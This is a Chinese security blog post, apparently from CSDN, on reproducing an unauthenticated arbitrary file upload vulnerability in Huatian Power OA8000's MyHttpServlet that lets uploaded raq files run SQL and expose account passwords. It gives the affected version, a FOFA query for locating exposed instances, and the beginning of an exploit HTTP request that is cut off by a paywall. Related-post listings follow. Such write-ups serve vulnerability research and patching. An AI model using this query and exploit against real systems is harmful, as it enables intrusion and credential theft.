华天动力-OA8000 MyHttpServlet 文件上传漏洞复现

已于 2023-11-29 14:57:13 修改
阅读量1.9k 收藏 10
点赞数 13
分类专栏: 漏洞复现v1 文章标签: 安全 web安全
于 2023-11-29 14:55:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134689434
版权
本文详细介绍了华天动力OA8000产品中MyHttpServlet存在的任意文件上传漏洞,该漏洞允许未认证攻击者上传恶意raq文件执行SQL,获取敏感信息。受影响的版本为OA8000平台版 DLHT-OA8000-3-0-7.2-3-1-0-500。复现环境通过FOFA查询,已提供exploit示例,并建议用户及时更新官方发布的安全补丁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

   华天动力OA是一款将先进的管理思想、 管理模式和软件技术、网络技术相结合,为用户提供了低成本、 高效能的协同办公和管理平台。

0x02 漏洞概述

  华天动力OA MyHttpServlet 存在任意文件上传漏洞,未经身份认证的攻击者可上传恶意的raq文件并执行raq文件中的任意sql语句,获取用户账号密码等敏感信息。

0x03 影响范围

OA8000平台版 DLHT-OA8000-3-0-7.2-3-1-0-500

0x04 复现环境

FOFA:app="华天动力-OA8000"

0x05 漏洞复现 

exp:

POST /OAapp/MyHttpServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=9b0af0d79eaea67c3aa1889b0b
了解本专栏 订阅专栏 解锁全文 超级会员免费看
华天OA任意文件上传漏洞 复现
薛定谔嘚喵博客
10-09 800
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。该OA系统存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器的敏感信息。
华天动力OA TemplateService 任意文件读取漏洞复现
0xSec
12-28 1768
华天动力OA TemplateService接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
华天动力OA8000 ntkoupload.jsp 任意文件上传漏洞[CNVD-2022-54886]复现
qq_53733257的博客
12-21 1877
华天动力OA8000 ntkoupload.jsp 任意文件上传漏洞[CNVD-2022-54886]复现
漏洞复现华天动力OA TemplateService接口处存在任意文件读取漏洞
https://blog.echo234.cn/
03-30 1185
华天软件有限公司(简称“华天动力”)是国内首批专注于独立OA协同软件研发、为政企提供垂直专业、数智化转型解决方案的科技创新型企业。华天动力OA TemplateService 接口处存在任意文件读取漏洞,攻击者可以利用此漏洞获取系统敏感信息。
漏洞复现华天动力-OA-ntkoupload-文件上传
知黑而守白
01-11 391
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。华天动力OA系统中的 ntkoupload 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
漏洞复现】天OA存在任意文件上传漏洞
失心少年
09-08 1194
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。第二步这里,我试了几次没有写成功,可能是post请求body部分哪里没有搞对,有兴趣的可以试一试,成功了告诉我。
华天动力OA ntkodownload.jsp 任意文件读取漏洞(含批量验证poc)
weixin_43567873的博客
04-07 301
华天动力OA ntkodownload.jsp 任意文件读取漏洞(含批量验证poc)
复现】用友u8CRM 文件读取漏洞
fushuang333的博客
12-28 902
复现】用友u8CRM 文件读取漏洞。用友U8CRM 是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。
复现华天动力OA办公系统 任意文件读取漏洞_62
fushuang333的博客
03-02 1527
复现华天动力OA办公系统 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
华天动力OA downloadWpsFile接口处任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
07-26 339
华天动力OA downloadWpsFile接口处存在任意 文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
华天OA漏洞复现手册
1stPeak's Blog
04-21 5889
前言:万户OA产品漏洞复现笔记,供自己使用,不定期更新 声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。 漏洞列表: 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞 万户OA download_ftp.jsp 任意文件下载漏洞 漏洞描述 万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件 漏洞影响 万户OA 网络测绘 app="万户网络-ezOFFICE" 漏洞复现 ...
华天动力-OA-hrapplicationformservice-信息泄露(含批量验证poc)
weixin_43567873的博客
04-17 334
华天动力-OA-hrapplicationformservice-信息泄露(含批量验证poc)
文件上传漏洞(一)
不秃头的程序Yang
05-18 2983
简介 文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上传可执行的动态脚本文件。如常见的头像上传, 图片上传,oa 办公文件上传,媒体上传,允许用户上传文件,如果过滤不严格,恶意用户利用文件上传漏洞,上传有害的可以执行脚本文件到服务器中,可以获取服务器的权限,或进一步危害服务器。 ...
华天动力OA workFlowService SQL注入获得root权限
失心少年
08-04 815
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!发现mysql为root权限,剩下的就简单了,查目录写文件。fofa:app=“华天动力-OA8000”到这里,oa的路径也就得到了,剩下的自由发挥。该命令可查询到mysql按照路径,2、sqlmap梭哈。
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
最新发布
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
Servlet 文件上传
lsx202406的博客
07-17 868
通过上述步骤,您可以在Servlet中实现文件上传功能。确保在处理文件上传时注意安全性,并根据需要调整文件大小和类型的限制。
华天动力 ntkodownload 任意文件读取漏洞
qq_36334672的博客
02-04 403
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。华天动力OA ntkodownload.jsp接口处存在任意文件读取漏洞,恶意攻击者可能会利用此漏洞获取敏感信息,造成信息泄露。
OA系统漏洞记录
Aquarius_ego的博客
05-14 5119
OA系统介绍及相关漏洞(不断更新哦~)
文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell
weixin_39993623的博客
12-11 1605
点击蓝字|关注我们通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell一、漏洞介绍/Profile/通达OA介绍:通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,北京通达信科科技有限公司是一支以协同管理软件研发与实施、服务与咨询为主营业务的高科技团队,是国内协同管理软件行业里唯一一家央企单位,中国协同管理软件的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值